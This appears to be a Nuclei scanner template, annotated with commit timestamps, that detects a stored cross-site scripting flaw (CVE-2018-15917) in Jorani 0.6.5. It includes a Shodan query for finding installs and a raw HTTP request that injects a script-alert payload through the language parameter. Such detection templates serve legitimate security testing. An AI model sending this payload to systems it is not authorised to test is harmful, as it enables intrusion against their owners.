2023-08-31 15:43:46 +00:00
id : CVE-2018-15917
info :
name : Jorani Leave Management System 0.6.5 - Cross-Site Scripting
author : ritikchaddha
severity : medium
description : |
Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade to the latest version to mitigate this vulnerability.
2023-08-31 15:43:46 +00:00
reference :
- https://www.exploit-db.com/exploits/45338
- https://nvd.nist.gov/vuln/detail/CVE-2018-15917
2023-10-14 11:27:55 +00:00
- https://github.com/bbalet/jorani/issues/254
2024-01-29 17:11:14 +00:00
- https://github.com/JavierOlmedo/JavierOlmedo
2023-08-31 15:43:46 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cve-id : CVE-2018-15917
cwe-id : CWE-79
2024-01-29 17:11:14 +00:00
epss-score : 0.04217
2024-03-23 09:28:19 +00:00
epss-percentile : 0.92046
2023-10-14 11:27:55 +00:00
cpe : cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:*
2023-08-31 15:43:46 +00:00
metadata :
verified : true
2023-09-06 12:57:14 +00:00
max-request : 2
2023-10-14 11:27:55 +00:00
vendor : jorani_project
product : jorani
2023-08-31 15:43:46 +00:00
shodan-query : title:"Login - Jorani"
2023-12-05 09:50:33 +00:00
tags : cve,cve2018,jorani,xss,jorani_project
2023-08-31 15:43:46 +00:00
http :
- raw :
- |
GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1
Host : {{Hostname}}
- |
GET /session/login HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
part : body
words :
- '<script>alert(document.domain)</script>'
- '_jorani'
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2024-01-30 06:46:18 +00:00
# digest: 490a004630440220107beb1af83054f9a9af2a941d6770897f5df1aed760488592cce1aa511bb9ca0220758a93ca12ef34dd1899071bf994daf73542d6639b7c2cc333b5e9c6081b7ecd:922c64590222798bb761d5b6d8e72950